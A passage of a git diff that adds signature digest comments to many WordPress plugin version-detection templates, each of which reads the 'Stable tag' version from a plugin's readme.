a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 3dbb03067b..27050fcef8 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022044aaa81f67f6c878e943351b85a1c5d25c5d0545c95cd85ef81e3a0877e85349022023f736dfb8cf7696a586116e7904174dbeb111efe78ceff05b35c598aa99ccf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..2f32f53226 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc7c7e7503083c44393a3f2d73f2d5c1c043263403c7a2715ffb50ee4842e7fa02203139f245c5ebf7bb1b6442f4f6f63c5244ac638e19bd270112300905e297e063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..80679fb0ba 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dda25dc4498cd9c822d894cfcde2bab202c1d9196e96ea4da2232d198992d3b60221008ad164f0989a8ee5d6ffc76b116ef30ab281c009024de5fadc03e2d8e2d57eed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..60de4225b0 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b3b45edd20e7890f32795ad8969468255ff487e4037f315f7912eb85611cbaeb022100d36b8d5d813510552c3bcb0014abfb1ebda219541cf3caf9199e856423551c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..49fa6fd35b 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220763d27399fc30e32e3cc846111fe70067661fa017241c2bc9a075620a15754650220114f4c19dd6cb126bad056e643b415ec8b7113d145c3b1ed5673a393f004a8a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..ccd0d132df 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022002edb5f9f6be5b678c6b2fce5a755c320049086376f9b552a4485888dbec01060220427e4dfc74e6e94f7141956c4fb8c9a7f16bbf50661b135a50469f2870567fa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..7f3daf5ac8 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b061ee93cf3f6d53cbca63dba2682f3b81baeb31fa5cc0fcbf1b6b7bc22a8f55022100f99188d598378d834094d479f2e4d3c49841ff86a78d8aabda25f133293bb629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..2df0bc33cf 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc68c6b964289988fcd0952ecdfa914d8d7f06675107b1820be09e1c37c7c0f0022034b056418749cd8d07cfedaf2541ba7f271b85650e5d1f646d19f2f4237e7ca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..62c8e20422 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001d843d996fb1b8eb83d8a1e288f486eb13dd41f2856c365a90f82bd7b0384d802210093ae53aac96cadae43d915946f1e96e899d8634646af6ad669e0884f5deee595:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..6222c0d2b4 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210093053619c2e285f2534fdc1a718372e409481f4d0af0db0be3c62bc864fe5163022100973a0a0a13a14b635b6aea2e0d73007ead2437c9bcbd5ce432c25886ccb172d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..581fef72b5 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201333a2837d71cf1dfdb17246c80800d4709ef284c0f3cee8930083133f5ba3b7022100a0498e7688aad3ee9eeb4c9a9f719a636f92f0eda102a0126932f7024f6c7cff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..29c8879c85 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ebfad07c54d558f91ca54dd1ac5176f44d1cd4975d5e5c11fa3dca8a52882e5f0220295e2b92bec86605c0cfa6c4bda218ed908ae9b2473399882c6e95fb7c8a3c96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..1413c2dd46 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a038b3210f4baf3933d02c3fcc191f3ebb6c3a5dd75fc70cc4189381e4f46ba022100d30d1d98080993c301d9b03356de6aa3d8bc343b42d7723b93cf6f47b47e1056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4e5e95d80c 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a4004fd28c0ec27c161a4e749d339c8f7e2c9769d8d622c3be6cfb0587fe8bd702201ed15017ef226aaa5ca3305fb9018f7c1316547244e51851d6623137cd012e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..92d2c7ecbf 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210086db187cb7598383d00bbfd697be1950e14515b6097582a40bad8ae66d304fba022100f35c8f2a5148c027ec960128c1c72a909c6406681a7090f45e6f2c0563b73ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index cd248e018b..0571a0bf52 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220231cd299a15349df2a302c91efc8fab2662ece12e43d718d517852a76350b1b1022021d9ff4165c3d9c5a8dd95721cdcd0a5e1285247730059904d31b19ecc7f73c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 7e62a84cca..723d9be870 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210090a95a305d7234aae382123155af38abfc368286d802e9fdd76c4e26a55b744d022100fdddfe839d519d1a3516984b2d5413735e794dc577de94eb71aaa8acd07bfd2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..960fcdb90c 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3fceb29a0e792f937f552cdff96b47a24bf47d0c1a5254dbc45dbd239bfc339022100f7dcadf799e30cd248f51d695249d34d80f11898e7b062dbaf9ea748832c9ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..e962d3852d 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c6928d57fa3099f19fcb4dfb0ea78c682b139cbadf6ba59631aa31e6630f5413022078c864f5d147ac28772823092a40d9145c6719747239da7d0e4464f29cdd1237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c7ae2d51dd..228ebc5dd8 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d98a6fcdd3090f15499090b21db28b812c7b2cfede97588efcdea568b7eb9a802203ded8da8c5dca2eee2bf7fd75037bf42d3091dea550408612c63cbc0c9273a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..97568c2268 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d7c0a4c423cb5403af9f9da752748527ba7332e024257bee371b424edfebf4b3022010c3a2cec2dd2e85b81ee516f882c05f6648919e4d0d8b53936cf8cc78f3fd7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..89eb70032d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210090b586143b3e3c9a3903dd4de68d8d7f5aedb3f45e7b35de92774bb567b2c823022100db81d9c5fb434f7946ae21bef2237a94a23e3a0ceccb864521c6477cf4d36618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..3cf06f71a6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ecddefb917ad7226594ce35d8606c530b5ebe859025b9e488c14673f7e8153b5022100c5d562b867ff41917c602b3877192175f61a783e30da18f95816ea06d2102190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..d140989d53 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220709f081c8e0619dd0e7132dc3798b03e3b9f0cbf55eabccf4c48b56fa90dadb90221008c5db23e63189a7da4fadb2d177db596a5ad150e6be1b4db1a78a08d3f613839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 299e5e4cb6..5f38118ac1 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e372e3bbd285248776c0a0b4dc92e1f445ee15511abec3f5021a2fcc5a7ae35b022100c21808f12192b9acbc975758e7515de47caa41aa4c4647624b8aae2a8bfe77b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..2dbdfb9ea5 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022011b23fad64e67bf6f1f9b042f77dd490198d2c873c15d491a3bfc2fd3e32099702204d69670ea68d1da3f988bcf62619a5871261bb3fab86f7ef1439cf3eb5ce25d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..012de55e8d 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206b32fa7c7dc1498bcb4bcaccf18a09120e73a28d2cca6aa9bc9fc3500bcc99e802202cd6e046318706dfb04dd5937a5b4050abbce38ca1dd18a7c771a09989cf0e81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..f474b75f12 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba6ab6a62d4a8ca75c55f644cabac15778ad5f2cf96d47bf0d0ca7628bbec05a02202aabc16b0b62907d3db70fc3acef564dccac94e50b8250887318c7373172676a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..62e5780363 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022076b459a65a97637239910c4f016e5dc67b7e7c26b67d39929e6ce175c68ca8e3022100f0eb6a1cbc32c3ce62147799546279c535ab903358694de42101af3939342882:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..d5fff28aff 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210089e2cf31119e068cecfba7f8a6630da65b48077ff84ddc99b035293d2c7aaf59022100d64f28f99d77b01e236cc46ef025ed5f24f5ac4a15621f70e0f8325cf47b7513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..f5f3e23682 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc529b2d36c660bc7f8bb1f49d1a5e5776ff19f11b18e6160ea7ea82c8610f0102202bf18e2ad5704a43b4c4ee2e53d61f0478357c3a87c632134210e910303dd7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..466eb4eff9 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e1cedff211eb30cbde820c83a54ac37af6df791c741b970899afac2521847c002202001fa766ce6ad845bbf46f6a911ee9643a4d84a8d196fee14729ef8333e698d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..94ecb82af3 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220363d559db71bca4e6bacca57863ff45f784dbe9d83e2fbe51467abe4e33a9354022100dc130f1ae54e452a2b08a315621e0bb2fda2b897e2cbcd6382ce6ac06797fc41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..21a920704a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022042d792adcfd9da20a6438d9332715ebffa051d7c8e460cf0ad9c8dc6e1abf17302205be146f7cefa3b49bcaeceed260b17284fbc467b244e35701d6be1132571a95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..4be66afe59 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008c1a4c1d0b54939129e0c98b8a48bb7b3a0b66a02dc5e4582a1988ba757be542022100e558718378ec35ab134553cccdc1b6d55427552894dcbb84801f0a2016618aff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..0ca7588e6c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9d903b9bb4cde62d1df3e6f9837afed15f9b51d12ca15ab45fce73e9024520e02210093206484a8582182692533388b184076a98ebe8aa816141939dc52a1662056cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5685dd5f08..302c32f2fd 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202317358efd65b34de2b098dc27475bf0f045c42cec6324cbff531e49cb5668ca022034e55b0438d59563c1534eaa66b7b4450e27571c640403b515b77d23bb807324:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..77fbf8034b 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c97efde959362ea917eb4cd5753a8de37d67e6a0778e785ca0ec13b70d81f9fa02200157de00d6c3d3051387351966a0ee6a1992bcb5e585149d553a430fcf36bbef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..16ecff2820 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220734aa45a81cdde2788ce1a69063d6a12c94afc05d5b75fa8ae00a4ed17b4774202205c3b09bd5f350887e8b0a804a6c9cd9999a4f39592ed445ca4380b53ca0cfd69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..a52c4dd8d1 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017fe54a9bf1c2b053104d13f3c8aa86f663b02953b4e17608db20bbba7708540022100aea0d118384ac6c844025e5c6d3dce511ebf58724df32b6a9698e2b401687939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..a69af92922 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aa07785796bfd4a57955323be813ad639140586a8f52fafac6041b81ed7c68e5022074fb21c65a8e19b098af28f15b4bbd88baa4bf6842df4c335f15d11d74c26190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index effba09471..3b14af9787 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025e237a6d344100c0bf9a7b0d7ac0ab8ee21e3450654f97eeacebb873c0063cb022100f5cdff61cbc80f3b16e961f246cdb430c3d30e7c9fc4184185da044bdfeaeac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 37153b7ae5..36b1fb9e4c 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004242366b1ff68b768ae27934051864857b2a081c138b84b3ba46bed6fdfc433022022dbb4ead02f5e10e80da9b260f77cbaf259778253e128bb9b17a8b82f88e787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..9e00053396 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022075c6ddc124907e3cb4e711923d8759125ac7c327cf32bf74531a0aa4f636deb7022042cb636578caaeff5c485d2f7871cc09a817181ae66cbbb7b60a82a79c66c669:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..c8f392f67d 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aaaf602239f077a29cee57137feec3d33a8b94194999638da7750ea25fc9a9370220194225389c8a4962ece9c6d6f8319f9aa7493372a1a46e66d6e1ddf354907cfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 3462f5ea6b..696ea35f5f 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220361289f820db1b57f66b54af13d510c095a8d2c887bf25f4834f0c3d403b916402207c589f3e0e0b8cad18f62ca2b6a2b0a909fb9c57390a94c738d0de15fdc9f7ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 5c9ae8bc4f..58b5bbe2cd 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022011f37dfea682c44d81d02f399707c1b2e068c5609c32030c687ae6dbcf8764140220713a5c1ddbbc1c5f0ee6d11602ed5579c50ba79df2f420c1bfad01db9b8b8924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..dd465993a0 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,3 +47,4 @@ http: part: body 